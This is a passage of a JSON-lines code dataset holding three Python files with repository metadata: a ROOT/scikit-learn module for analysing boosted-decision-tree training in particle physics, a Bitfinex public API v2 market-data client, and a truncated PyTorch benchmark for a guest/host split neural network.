128, "usage_type": "attribute"}, {"api_name": "config.get_model_folder", "line_number": 137, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 138, "usage_type": "call"}, {"api_name": "dataset8.get_ds8", "line_number": 140, "usage_type": "call"}, {"api_name": "config.get_config", "line_number": 149, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "20276449246", "text": "import pickle\n\nfrom sklearn.ensemble import AdaBoostClassifier\n\nimport ROOT\nimport PyAnalysisTools.PlottingUtils.PlottingTools as PT\nimport PyAnalysisTools.PlottingUtils.Formatting as FT\nimport PyAnalysisTools.PlottingUtils.Formatting as FM\nfrom PyAnalysisTools.AnalysisTools.MLHelper import TrainingReader, MLTrainConfig\nfrom PyAnalysisTools.base import InvalidInputError\nfrom PyAnalysisTools.base.OutputHandle import OutputFileHandle\nfrom PyAnalysisTools.base.FileHandle import FileHandle\nfrom PyAnalysisTools.PlottingUtils.PlotConfig import PlotConfig as pc\nfrom PyAnalysisTools.AnalysisTools.StatisticsTools import get_KS\nfrom PyAnalysisTools.base.ShellUtils import copy\nfrom PyAnalysisTools.base.YAMLHandle import YAMLLoader as yl\n\n\nclass BDTConfig(object):\n def __init__(self, **kwargs):\n kwargs.setdefault('num_layers', 4)\n for k, v in kwargs.items():\n setattr(self, k.lower(), v)\n\n\nclass SklearnBDTTrainer(object):\n def __init__(self, **kwargs):\n kwargs.setdefault('output_path', './')\n self.train_cfg = MLTrainConfig(**yl.read_yaml(kwargs['training_config_file']))\n self.bdt_cfg = BDTConfig(**yl.read_yaml(kwargs['bdt_config_file']))\n if 'variables' in kwargs:\n self.variable_list = kwargs['variables']\n elif 'var_list' in kwargs:\n self.variable_list = yl.read_yaml(kwargs['var_list'])['inputs']\n # copy(kwargs['var_list'], os.path.join(kwargs['output_path'], 'var_list.yml'))\n else:\n self.variable_list = None\n self.reader = TrainingReader(**kwargs)\n self.signal_df = None\n self.bkg_df = None\n self.labels = None\n for k, v in kwargs.items():\n setattr(self, k.lower(), v)\n\n def load_train_data(self):\n self.signal_df, self.bkg_df, self.labels = self.reader.prepare_data(self.train_cfg,\n variable_list=self.variable_list)\n\n def train_bdt(self):\n clf = AdaBoostClassifier()\n X_train, y_train, X_test, y_test = self.reader.pre_process_data(self.signal_df, self.bkg_df, self.labels,\n self.train_cfg, self.output_path)\n clf.fit(X_train, y_train)\n with open('test.pkl', 'wb') as f:\n pickle.dump(clf, f)\n\n\nclass BDTAnalyser(object):\n def __init__(self, **kwargs):\n if \"input_files\" not in kwargs:\n raise InvalidInputError(\"No input files provided\")\n kwargs.setdefault(\"output_path\", \"./\")\n self.file_handles = [FileHandle(file_name=file_name) for file_name in kwargs[\"input_files\"]]\n self.output_handle = OutputFileHandle(output_dir=kwargs[\"output_path\"])\n for arg, val in kwargs.iteritems():\n if not hasattr(self, arg):\n setattr(self, arg, val)\n ROOT.gROOT.SetBatch(True)\n\n def analyse(self):\n \"\"\"\n Main entry point to perform BDT analysis\n \"\"\"\n self.analyse_train_variables()\n self.perform_overtraining_check()\n self.perform_correlation_analysis()\n self.analyse_roc_curves()\n self.output_handle.write_and_close()\n\n def perform_overtraining_check(self):\n for file_handle in self.file_handles:\n self.analyse_overtraining(file_handle)\n\n def analyse_train_variables(self):\n for file_handle in self.file_handles:\n self.plot_train_variables(file_handle)\n\n def plot_train_variables(self, file_handle):\n def classify():\n variables = {}\n for signal_hist in signal_hists:\n variables[signal_hist.GetName().replace(\"__Signal\", \"\")] = [signal_hist]\n for background_hist in background_hists:\n variables[background_hist.GetName().replace(\"__Background\", \"\")].append(background_hist)\n return variables\n\n signal_hists = file_handle.get_objects_by_pattern(\"[A-z]*__Signal\",\n \"dataset/Method_BDTG/BDTG\")\n background_hists = file_handle.get_objects_by_pattern(\"[A-z]*__Background\",\n \"dataset/Method_BDTG/BDTG\")\n variables_hists = classify()\n for variable_name, variable_hists in variables_hists.iteritems():\n plot_config = pc(name=\"{:s}_{:d}\".format(variable_name, self.file_handles.index(file_handle)),\n color=[ROOT.kRed, ROOT.kBlue],\n draw=\"Hist\",\n watermark=\"Internal\",\n normalise=True,\n ymax=0.2)\n canvas = PT.plot_histograms(variable_hists, plot_config)\n FM.decorate_canvas(canvas, plot_config)\n self.output_handle.register_object(canvas, tdir=\"train_variables\")\n\n def analyse_overtraining(self, file_handle):\n training_score_signal = file_handle.get_object_by_name(\"MVA_BDTG_Train_S\", \"dataset/Method_BDTG/BDTG\")\n training_score_background = file_handle.get_object_by_name(\"MVA_BDTG_Train_B\", \"dataset/Method_BDTG/BDTG\")\n eval_score_signal = file_handle.get_object_by_name(\"MVA_BDTG_S\", \"dataset/Method_BDTG/BDTG\")\n eval_score_background = file_handle.get_object_by_name(\"MVA_BDTG_B\", \"dataset/Method_BDTG/BDTG\")\n\n ymax = 1.6 * max([training_score_signal.GetMaximum(), training_score_background.GetMaximum(),\n eval_score_signal.GetMaximum(), eval_score_background.GetMaximum()])\n\n kolmogorov_signal = get_KS(training_score_signal, eval_score_signal)\n kolmogorov_background = get_KS(training_score_background, eval_score_background)\n plot_config = pc(name=\"overtrain_{:d}\".format(self.file_handles.index(file_handle)),\n color=ROOT.kRed,\n draw=\"Marker\",\n style=20,\n ymax=ymax,\n watermark=\"Internal\")\n canvas = PT.plot_obj(training_score_signal, plot_config)\n plot_config.style = 24\n PT.add_object_to_canvas(canvas, eval_score_signal, plot_config)\n plot_config.style = 20\n plot_config.color = ROOT.kBlue\n PT.add_object_to_canvas(canvas, training_score_background, plot_config)\n plot_config.style = 24\n PT.add_object_to_canvas(canvas, eval_score_background, plot_config)\n FM.decorate_canvas(canvas, plot_config)\n FT.add_text_to_canvas(canvas, \"KS (signal): {:.2f}\".format(kolmogorov_signal), pos={'x': 0.18, 'y': 0.9},\n color=ROOT.kRed)\n FT.add_text_to_canvas(canvas, \"KS (bkg): {:.2f}\".format(kolmogorov_background), pos={'x': 0.18, 'y': 0.85},\n color=ROOT.kBlue)\n labels = [\"signal (train)\", \"signal (eval)\", \"background (train)\", \"background (eval)\"]\n FT.add_legend_to_canvas(canvas, labels=labels, xl=0.18, xh=0.3, yl=0.6, yh=0.82)\n self.output_handle.register_object(canvas, tdir=\"overtrain\")\n\n def perform_correlation_analysis(self):\n for file_handle in self.file_handles:\n self.analyse_correlations(file_handle)\n\n def analyse_correlations(self, file_handle):\n index = self.file_handles.index(file_handle)\n linear_corr_coeff_signal = file_handle.get_object_by_name(\"CorrelationMatrixS\", \"dataset\")\n linear_corr_coeff_background = file_handle.get_object_by_name(\"CorrelationMatrixB\", \"dataset\")\n plot_config = pc(name=\"linear_corr_coeff_signal_{:d}\".format(index), title=\"signal\", dist=None,\n draw_option=\"COLZTEXT\", ytitle=\"\", ztitle=\"lin. correlation [%]\")\n canvas_corr_coeff_signal = PT.plot_obj(linear_corr_coeff_signal, plot_config)\n plot_config.title = \"background\"\n plot_config.name = plot_config.name.replace(\"signal\", \"background\")\n canvas_corr_coeff_background = PT.plot_obj(linear_corr_coeff_background, plot_config)\n self.output_handle.register_object(canvas_corr_coeff_signal)\n self.output_handle.register_object(canvas_corr_coeff_background)\n correlation_hists_signal = file_handle.get_objects_by_pattern(\"scat_.*_Signal_Id\",\n \"dataset/InputVariables_Id/CorrelationPlots\")\n correlation_hists_background = file_handle.get_objects_by_pattern(\"scat_.*_Background_Id\",\n \"dataset/InputVariables_Id/CorrelationPlots\")\n plot_config_corr = pc(name=\"correlation_hist\", dist=None, draw_option=\"COLZ\", watermark=\"Internal\")\n for hist in correlation_hists_signal:\n variable_info = hist.GetName().split(\"_\")[1:-2]\n plot_config_corr.name = \"corr_\" + \"_\".join(variable_info) + \"_signal_{:d}\".format(index)\n split_index = variable_info.index(\"vs\")\n variable_x = \"_\".join(variable_info[:split_index])\n variable_y = \"_\".join(variable_info[split_index + 1:])\n plot_config_corr.xtitle = variable_x\n plot_config_corr.ytitle = variable_y\n plot_config_corr.ztitle = \"Entries\"\n canvas = PT.plot_obj(hist, plot_config_corr)\n FM.decorate_canvas(canvas, plot_config_corr)\n self.output_handle.register_object(canvas)\n for hist in correlation_hists_background:\n plot_config_corr.name = \"corr_\" + \"_\".join(hist.GetName().split(\"_\")[1:-2]) + \"_background_{:d}\".format(\n index)\n canvas = PT.plot_obj(hist, plot_config_corr)\n FM.decorate_canvas(canvas, plot_config_corr)\n self.output_handle.register_object(canvas)\n\n def analyse_roc_curves(self):\n for file_handle in self.file_handles:\n self.plot_roc_curves(file_handle)\n\n def plot_roc_curves(self, file_handle):\n def make_plot(dist, pc):\n roc_eff = file_handle.get_objects_by_pattern(dist, \"dataset/Method_BDTG/BDTG\")\n canvas = PT.plot_histograms(roc_eff, pc)\n FM.decorate_canvas(canvas, pc)\n self.output_handle.register_object(canvas, tdir=\"performance\")\n\n index = self.file_handles.index(file_handle)\n pc_roc_eff = pc(name=\"roc_eff_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\",\n ytitle=\"Background efficiency\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_effBvsS\", pc_roc_eff)\n pc_roc_inveff = pc(name=\"roc_inveff_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\", logy=True,\n ytitle=\"Inverse Background efficiency\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_invBeffvsSeff\", pc_roc_inveff)\n pc_roc_rejeff = pc(name=\"roc_rej_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\",\n ytitle=\"Background rejection\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_rejBvsS\", pc_roc_rejeff)\n\n def fit_score(self):\n bdt_score = ROOT.RooRealVar(self.branch_name, \"BDT score\", -0.9, 1.)\n chain = ROOT.TChain(\"Nominal/\" + self.tree_name)\n for file_handle in self.file_handles[1:]:\n chain.Add(file_handle.file_name)\n p0 = ROOT.RooRealVar(\"p0\", \"p0\", 1, -10., 10.)\n p1 = ROOT.RooRealVar(\"p1\", \"p1\", 1, -10., 10.)\n p2 = ROOT.RooRealVar(\"p2\", \"p2\", 1, -100., 100.)\n p3 = ROOT.RooRealVar(\"p3\", \"p3\", 1, -10., 10.)\n p4 = ROOT.RooRealVar(\"p4\", \"p4\", 1, -10., 10.)\n norm = ROOT.RooRealVar(\"norm\", \"norm\", chain.GetEntries(), 0., chain.GetEntries() * 2)\n mass = ROOT.RooRealVar(\"object_m\", \"object_m\", 0., 100000.)\n genpdf = ROOT.RooGenericPdf(\"genpdf\", \"genpdf\",\n \"norm * (p0 + p1 * exp(({:s} + 1.) *p2) + \"\n \"p3 * abs({:s})^(({:s} + 1.)*p4))\".format(self.branch_name, self.branch_name,\n self.branch_name),\n ROOT.RooArgList(bdt_score, p0, p1, p2, p3, p4, norm))\n data = ROOT.RooDataSet(\"data\", \"BDT_170526\", chain, ROOT.RooArgSet(bdt_score, mass),\n \"object_m/1000. < 1713. || object_m/1000. > 1841.\")\n frame = bdt_score.frame()\n data.plotOn(frame, ROOT.RooFit.Name(\"data\"), ROOT.RooFit.Binning(25))\n fit_result = genpdf.fitTo(data, ROOT.RooFit.Save())\n canvas = ROOT.TCanvas(\"c\", \"c\", 800, 600)\n canvas.cd()\n genpdf.plotOn(frame, ROOT.RooFit.Name(\"model\"))\n PT.add_fit_to_canvas(canvas, fit_result, genpdf, frame)\n FM.add_atlas_label(canvas, \"Internal\")\n frame.Draw()\n canvas.Modified()\n self.output_handle.register_object(canvas)\n self.output_handle.write_and_close()\n", "repo_name": "morgenst/PyAnalysisTools", "sub_path": "PyAnalysisTools/AnalysisTools/BDTAnalyser.py", "file_name": "BDTAnalyser.py", "file_ext": "py", "file_size_in_byte": 12900, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyAnalysisTools.AnalysisTools.MLHelper.MLTrainConfig", "line_number": 29, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 29, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 29, "usage_type": "name"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 30, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 30, "usage_type": "name"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 34, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 34, "usage_type": "name"}, {"api_name": "PyAnalysisTools.AnalysisTools.MLHelper.TrainingReader", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.ensemble.AdaBoostClassifier", "line_number": 50, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 55, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.InvalidInputError", "line_number": 61, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.FileHandle.FileHandle", "line_number": 63, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.OutputHandle.OutputFileHandle", "line_number": 64, "usage_type": "call"}, {"api_name": "ROOT.gROOT.SetBatch", "line_number": 68, "usage_type": "call"}, {"api_name": "ROOT.gROOT", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 103, "usage_type": "call"}, {"api_name": "ROOT.kRed", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ROOT.kBlue", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_histograms", "line_number": 109, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 109, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 110, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 110, "usage_type": "name"}, {"api_name": "PyAnalysisTools.AnalysisTools.StatisticsTools.get_KS", "line_number": 122, "usage_type": "call"}, {"api_name": "PyAnalysisTools.AnalysisTools.StatisticsTools.get_KS", "line_number": 123, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 124, "usage_type": "call"}, {"api_name": "ROOT.kRed", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 130, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 130, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 132, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 132, "usage_type": "name"}, {"api_name": "ROOT.kBlue", "line_number": 134, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 135, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 135, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 137, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 137, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 138, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 138, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_text_to_canvas", "line_number": 139, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 139, "usage_type": "name"}, {"api_name": "ROOT.kRed", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_text_to_canvas", "line_number": 141, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 141, "usage_type": "name"}, {"api_name": "ROOT.kBlue", "line_number": 142, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_legend_to_canvas", "line_number": 144, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 144, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 155, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 157, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 157, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 160, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 160, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 167, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 177, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 177, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 178, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 178, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 183, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 183, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 184, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 184, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_histograms", "line_number": 194, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 194, "usage_type": "argument"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 194, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 195, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 195, "usage_type": "argument"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 195, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 199, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 202, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 205, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 210, "usage_type": "call"}, {"api_name": "ROOT.TChain", "line_number": 211, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 214, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 215, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 216, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 217, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 218, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 219, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 220, "usage_type": "call"}, {"api_name": "ROOT.RooGenericPdf", "line_number": 221, "usage_type": "call"}, {"api_name": "ROOT.RooArgList", "line_number": 225, "usage_type": "call"}, {"api_name": "ROOT.RooDataSet", "line_number": 226, "usage_type": "call"}, {"api_name": "ROOT.RooArgSet", "line_number": 226, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Name", "line_number": 229, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 229, "usage_type": "attribute"}, {"api_name": "ROOT.RooFit.Binning", "line_number": 229, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Save", "line_number": 230, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 230, "usage_type": "attribute"}, {"api_name": "ROOT.TCanvas", "line_number": 231, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Name", "line_number": 233, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_fit_to_canvas", "line_number": 234, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 234, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_atlas_label", "line_number": 235, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 235, "usage_type": "name"}]} +{"seq_id": "28897294104", "text": "from datetime import datetime\n# local\nfrom . import constants_v2 as _c\nfrom . import models_v2 as _m\nfrom ..base import Client\nfrom .server import BitfinexServerV2 as Server\n\n_p = _c.Path\n\n\nclass BitfinexPublic(Client):\n def __init__(self, timeout=30):\n Client.__init__(self, Server(), timeout)\n\n def ticker(self, symbol: _c.Symbol = _c.Symbol.BTCUSD):\n symbol = _c.Symbol.check(symbol).value\n url = self.url_for(_p.TICKER, path_arg=symbol)\n data = self.get(url)\n return _m.TradingTicker.create_from_json(data)\n\n def tickers(self, symbols: list):\n symbols = [_c.Symbol.check(symbol).value for symbol in symbols]\n parameters = {\n 'symbols': symbols,\n }\n url = self.url_for(_p.TICKERS)\n data = self.get(url, params=parameters)\n return {ticker[0]: _m.TradingTicker.create_from_json(ticker[1:])\n for ticker in data}\n\n def trades(self,\n symbol: _c.Symbol = _c.Symbol.BTCUSD,\n limit=None,\n start=None,\n end=None,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n if isinstance(start, datetime):\n start = start.timestamp() * 1000\n if isinstance(end, datetime):\n end = end.timestamp() * 1000\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'limit': limit,\n 'start': start,\n 'end': end,\n 'sort': sort,\n }\n url = self.url_for(_p.TRADES, path_arg=symbol)\n data = self.get(url, params=parameters)\n return [_m.TradingTrade.create_from_json(trade)\n for trade in data]\n\n def books(self,\n symbol: _c.Symbol,\n precision: _c.BookPrecision,\n length=None):\n symbol = _c.Symbol.check(symbol).value\n precision = _c.BookPrecision.check(precision).value\n parameters = {\n 'len': length,\n }\n path_arg = '{0}/{1}'.format(symbol, precision)\n url = self.url_for(_p.BOOKS, path_arg=path_arg)\n data = self.get(url, params=parameters)\n return [_m.TradingBook.create_from_json(book)\n for book in data]\n\n def stats(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n section: str,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n assert key in ['funding.size', 'credits.size', 'credits.size.sym', 'pos.size']\n assert size in ['1m']\n assert side in ['long', 'short']\n assert section in ['last', 'hist']\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'sort': sort,\n }\n path_arg = '{0}:{1}:{2}:{3}/{4}'.format(key, size, symbol, side, section)\n url = self.url_for(_p.STATS, path_arg=path_arg)\n data = self.get(url, params=parameters)\n if section == 'last':\n return _m.Stat.create_from_json(data)\n else:\n return [_m.Stat.create_from_json(stat)\n for stat in data]\n\n def stats_last(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n sort=None):\n return self.stats(symbol, key, size, side, 'last', sort)\n\n def stats_hist(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n sort=None):\n return self.stats(symbol, key, size, side, 'hist', sort)\n\n def candles(self,\n symbol: _c.Symbol,\n section: str,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n assert time_frame in ['1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1D', '7D', '14D', '1M']\n assert section in ['last', 'hist']\n if isinstance(start, datetime):\n start = start.timestamp() * 1000\n if isinstance(end, datetime):\n end = end.timestamp() * 1000\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'limit': limit,\n 'start': start,\n 'end': end,\n 'sort': sort,\n }\n path_arg = '{0}:{1}/{2}'.format(time_frame, symbol, section)\n url = self.url_for(_p.CANDLES, path_arg=path_arg)\n data = self.get(url, params=parameters)\n if section == 'last':\n return _m.Candle.create_from_json(data)\n else:\n return [_m.Candle.create_from_json(candle)\n for candle in data]\n\n def candles_last(self,\n symbol: _c.Symbol,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n return self.candles(symbol, 'last', time_frame, limit, start, end, sort)\n\n def candles_hist(self,\n symbol: _c.Symbol,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n return self.candles(symbol, 'hist', time_frame, limit, start, end, sort)\n", "repo_name": "mglcampos/trader", "sub_path": "htr/helpers/wrappers/bitfinex/client_public_v2.py", "file_name": "client_public_v2.py", "file_ext": "py", "file_size_in_byte": 5460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Client", "line_number": 11, "usage_type": "name"}, {"api_name": "base.Client.__init__", "line_number": 13, "usage_type": "call"}, {"api_name": "base.Client", "line_number": 13, "usage_type": "name"}, {"api_name": "server.BitfinexServerV2", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 123, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "argument"}]} +{"seq_id": "26895681135", "text": "import argparse\nimport numpy as np\nimport os\nfrom tensorflow import keras\nimport pandas\nimport tensorflow as tf\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras import optimizers\nfrom sklearn import metrics\nfrom pipeline.utils.tools import JobConfig\nfrom sklearn.preprocessing import LabelEncoder\n\nimport torch as t\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader\nimport tqdm\nfrom pipeline import fate_torch_hook\nfate_torch_hook(t)\n\n\nclass TestModel(t.nn.Module):\n\n def __init__(self, guest_input_shape, host_input_shape):\n super(TestModel, self).__init__()\n\n self.guest_bottom = t.nn.Sequential(\n nn.Linear(guest_input_shape, 10, True),\n nn.ReLU(),\n nn.Linear(10, 8, True),\n nn.ReLU()\n )\n\n self.host_bottom = t.nn.Sequential(\n nn.Linear(host_input_shape, 10, True),\n nn.ReLU(),\n nn.Linear(10, 8, True),\n nn.ReLU()\n )\n\n self.inter_a, self.inter_b = t.nn.Linear(8, 4, True), t.nn.Linear(8, 4, True)\n\n self.top_model_guest = t.nn.Sequential(\n nn.Linear(4, 1, True),\n nn.Sigmoid()\n )\n\n def forward(self, data):\n x_guest, x_host = data[0].type(t.float), data[1].type(t.float)\n guest_fw = self.inter_a(self.guest_bottom(x_guest))\n host_fw = self.inter_b(self.host_bottom(x_host))\n out = self.top_model_guest(guest_fw + host_fw)\n return out\n\n def predict(self, data):\n rs = self.forward(data)\n return rs.detach().numpy()\n\n\nclass TestDataset(Dataset):\n\n def __init__(self, guest_data, host_data, label):\n super(TestDataset, self).__init__()\n self.g = guest_data\n self.h = host_data\n self.l = label\n\n def __getitem__(self, idx):\n return self.g[idx], self.h[idx], self.l[idx]\n\n def __len__(self):\n return len(self.l)\n\n\ndef build(param, shape1, shape2):\n return TestModel(shape1, shape2)\n\n\ndef main(config=\"./config.yaml\", param=\"./hetero_nn_breast_config.yaml\"):\n\n try:\n if isinstance(config, str):\n config = JobConfig.load_from_file(config)\n data_base_dir = config[\"data_base_dir\"]\n else:\n data_base_dir = config.data_base_dir\n if isinstance(param, str):\n param = JobConfig.load_from_file(param)\n data_guest = param[\"data_guest\"]\n data_host = param[\"data_host\"]\n idx = param[\"idx\"]\n label_name = param[\"label_name\"]\n # prepare data\n Xb = pandas.read_csv(os.path.join(data_base_dir, data_guest), index_col=idx)\n Xa = pandas.read_csv(os.path.join(data_base_dir, data_host), index_col=idx)\n y = Xb[label_name]\n out = Xa.drop(Xb.index)\n Xa = Xa.drop(out.index)\n Xb = Xb.drop(label_name, axis=1)\n # torch model\n model = build(param, Xb.shape[1], Xa.shape[1])\n Xb = t.Tensor(Xb.values)\n Xa = t.Tensor(Xa.values)\n y = t.Tensor(y.values)\n dataset = TestDataset(Xb, Xa, y)\n batch_size = len(dataset) if param['batch_size'] == -1 else param['batch_size']\n dataloader = DataLoader(dataset, batch_size=batch_size)\n optimizer = t.optim.Adam(lr=param['learning_rate']).to_torch_instance(model.parameters())\n\n if param['eval_type'] == 'binary':\n loss_fn = t.nn.BCELoss()\n\n for i in tqdm.tqdm(range(param['epochs'])):\n\n for gd, hd, label in dataloader:\n optimizer.zero_grad()\n pred = model([gd, hd])\n loss = loss_fn(pred.flatten(), label.type(t.float32))\n loss.backward()\n optimizer.step()\n\n eval_result = {}\n for metric in param[\"metrics\"]:\n if metric.lower() == \"auc\":\n predict_y = model.predict([Xb, Xa])\n auc = metrics.roc_auc_score(y, predict_y)\n eval_result[\"auc\"] = auc\n elif metric == \"accuracy\":\n predict_y = np.argmax(model.predict([Xb, Xa]), axis=1)\n predict_y = label_encoder.inverse_transform(predict_y)\n acc = metrics.accuracy_score(y_true=labels, y_pred=predict_y)\n eval_result[\"accuracy\"] = acc\n\n data_summary = {}\n except Exception as e:\n print(e)\n return data_summary, eval_result\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\"BENCHMARK-QUALITY SKLEARN JOB\")\n 